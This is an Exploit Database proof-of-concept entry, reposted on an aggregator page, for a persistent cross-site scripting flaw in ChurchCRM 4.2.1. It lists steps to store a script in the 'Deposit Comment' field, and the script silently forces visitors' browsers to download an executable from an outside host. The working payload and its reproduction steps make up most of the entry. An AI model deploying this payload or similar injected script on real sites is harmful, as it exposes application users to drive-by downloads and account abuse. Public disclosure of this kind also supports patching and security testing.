ChurchCRM 4.2.1 – Persistent Cross Site Scripting (XSS)

• Exploit Database
• 18 阅读

• 作者： Mufaddal Masalawala
  日期： 2020-12-02
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49172/

• #Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)
  #Date: 2020- 10- 29
  #Exploit Author: Mufaddal Masalawala
  #Vendor Homepage: https://churchcrm.io/
  #Software Link: https://github.com/ChurchCRM/CRM
  #Version: 4.2.1
  #Tested on: Kali Linux 2020.3
  #Proof Of Concept:
  ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability:
  
   1. Login to the application, go to 'View all Deposits' module.
   2. Add the payload ( <script>var link = document.createElement('a');
   link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
   link.download = ''; document.body.appendChild(link); link.click();
  </script>
   ) in the 'Deposit Comment' field and click "Add New Deposit".
   3. Payload is executed and a .exe file is downloaded.